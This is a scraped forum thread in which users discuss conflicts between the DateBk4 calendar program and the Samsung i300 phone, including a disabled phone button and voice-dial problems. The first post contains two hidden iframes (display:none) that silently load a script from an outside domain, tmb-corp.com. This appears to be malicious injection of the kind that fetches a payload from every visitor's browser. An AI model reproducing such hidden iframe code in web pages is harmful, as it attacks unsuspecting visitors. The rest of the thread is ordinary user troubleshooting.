+ Reply to Thread

Can I use Datebk4?

I have heard there is a problem using Datebk 4 on the Samsung i300. Is this true. If so, is there another comparable program that works?

Thanks
    Peter
    pwc@itsa.ucsf.edu<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Peter

I have made a post on this forum because DateBk4 disabled my telephone pad screen. I haven't had that happen since unistalling DateBk4. I would be interested to learn whether others have the same problem.

Post DateBk 4

I have datebk 4 and as I and others have written in another thread regarding this and other potential problem programs, Datebk 4 may be responsible for complicated the voice memo/dial button functionality on some of our phones. I have noticed no other conflicts on mine. I have only to do a soft reset after each hotsync in order to enable my voice dial/memo button. Check out that other thread we listed a whole slew of programs that we have installed on our phones that may be suspects for causin havoc.

Good luck

Prahneum

Angry Problems Also

I bought my I300 today and hot synced with the programs that I previously had installed on my Palm Vx. I had DateBk 4 with the lastest version.

I noticed immediately that my phone button on the side did not work. After I deleted DateBk 4, and did a warm reset the problem was gone.

I emailed Pimlico Software, to see if the problem could be fixed.

Laurie